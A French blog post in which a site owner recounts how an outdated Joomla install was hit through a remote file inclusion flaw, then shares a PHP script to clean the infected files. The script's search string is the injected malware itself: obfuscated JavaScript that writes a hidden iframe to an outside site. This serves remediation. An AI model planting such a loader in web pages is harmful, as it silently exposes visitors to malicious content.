Durant une partie de la journée, mon blog est devenu inaccessible. La raison étant qu’un vilain petit hacker s’est amusé à pourrir mon site. En réalité, ce n’est pas une personne mais un script qui parcours le net à la recherche de potentielles failles de sécurité sur les sites.
Mais que s’est-il passé ?
Même si mon blog fonctionne sous Wordpress pour des raisons de conforts, la racine de mon site est basé sur le CMS Joomla. Je n’utilise plus ou très peu ce dernier et cela faisait longtemps que je n’avais pas mis à jour sa version (passage de 1.0.12 à 1.0.15). J’ai donc découvert une faille d’inclusion de fichiers distant dans la variable mosConfig_absolute_path. Un exploit bien simple mais très ennuyeux car le hacker peut exécuter n’importe quel code PHP sur votre site.
Résultats
Le hacker en à profiter pour modifier tous mes fichiers PHP (1822 au total) pour y inclure un script qui s’exécute sur la machine cliente. Ne craignez rien, j’ai supprimé le code qui était bloqué par votre antivirus dans tous les cas.
J’ai donc utilisé un script maison pour remédier au problème et supprimer le code malicieux de mes fichiers sources. Le code source est le suivant (à utiliser à vos risques et périls sur votre serveur) :
- <?php
- //passer à true pour afficher les détails des fichiers
- $show_details = false;
- //passer à TRUE pour effectuer le nettoyage
- $process = true;
- //ecrit dans le fichier n les données d
- function file_put_cont($n, $d) {
- $f = @fopen($n, ‘w’);
- if ($f === false) {
- echo "Impossible d’ouvrir le fichier ".$n;
- } else {
- if (is_array($d)) $d = implode($d);
- $bytes_written = fwrite($f, $d);
- fclose($f);
- return $bytes_written;
- }
- }
- //scan les répertoires récursivement
- //retourne un tableau contenant les fichiers php
- function searchdir ( $path = "." , $maxdepth = -1 , $mode = "FILES" , $d = 0 ){
- if ( substr ( $path , strlen ( $path ) - 1 ) != ‘/’ ) { $path .= ‘/’ ; }
- $dirlist = array () ;
- if ( $mode != "FILES" ) { $dirlist[] = $path ; }
- if ( $handle = opendir ( $path ) ){
- while ( false !== ( $file = readdir ( $handle ) ) ){
- if ( $file != ‘.’ & $file != ‘..’ ){
- $file = $path . $file ;
- if ( ! is_dir ( $file ) ) {
- if ( $mode != "DIRS" ) {
- $file_part = pathinfo($file);
- if($file_part[‘extension’] == "php" || $file_part[‘extension’] == "PHP") {
- $dirlist[] = $file ;
- }
- }
- }
- elseif ( $d >=0 & ($d < $maxdepth || $maxdepth < 0) ){
- $result = searchdir ( $file . ‘/’ , $maxdepth , $mode , $d + 1 ) ;
- $dirlist = array_merge ( $dirlist , $result ) ;
- }
- }
- }
- closedir ( $handle ) ;
- }
- if ( $d == 0 ) { natcasesort ( $dirlist ) ; }
- return ( $dirlist ) ;
- }
- //scan le tableau de fichier a la recherche de la chaine $token
- //retourne un tableau composé des fichiers qui contenait la chaine $token
- function searchstring($file_array , $token, $process) {
- $dirlist = array () ;
- for($i=0;$i<count($file_array);$i++){
- $cur_file = $file_array[$i];
- $cur_content_file = @file_get_contents($cur_file);
- if(stripos($cur_content_file,$token)!==false) {
- //ajout des fichiers au tableau
- $dirlist[] = $cur_file;
- //suppression de la chaine
- $new_content = str_replace($token, "", $cur_content_file);
- if($process == true){
- $var = file_put_cont($cur_file, $new_content);
- if($var != false) {
- if($show_details) {
- echo $var." octets ecrits dans ".$cur_file;
- }
- }
- } else {
- echo ‘File : ‘.$cur_file.‘<br/>’;
- }
- }
- }
- return ( $dirlist ) ;
- }
- echo ‘<h2>Nettoyage des fichiers PHP</h2>’;
- //scan les repertoires et recherche les fichiers php
- $arbo = searchdir(".");
- echo "Fichiers de l’arborescence : <br/>";
- if($show_details==true) {
- for($i=0;$i<count($arbo);$i++){
- echo ‘File : ‘.$arbo[$i].‘<br/>’;
- }
- } else {
- echo count($arbo)." fichiers.<br/>";
- }
- $token = ‘<?php echo \’<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\”ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\”ykfvj?3\”jgkijv?3\”htcogdqtfgt?2@"));</script>\’;?>’;
- echo "Chaine à rechercher : ".$token."<br/><br/>";
- //scan les fichiers trouvés afin de trouver la chaine incréminée
- echo "Fichiers infectés : <br/>";
- $arbo = searchstring($arbo, $token, $process);
- echo count($arbo)." fichiers modifiés !<br/>";
- if($process == true)
- echo "Opération terminée !<br/>";
- else echo "Mettre process à TRUE pour effectuer l’opération !<br/>";
- ?>
Le fichier liste les fichiers php de votre serveur, vérifie et supprime la chaine $token contenue des fichiers sources.
Conclusion
Mettez toujours à jour vos applications et effectuez des sauvegardes régulières, c’est vital !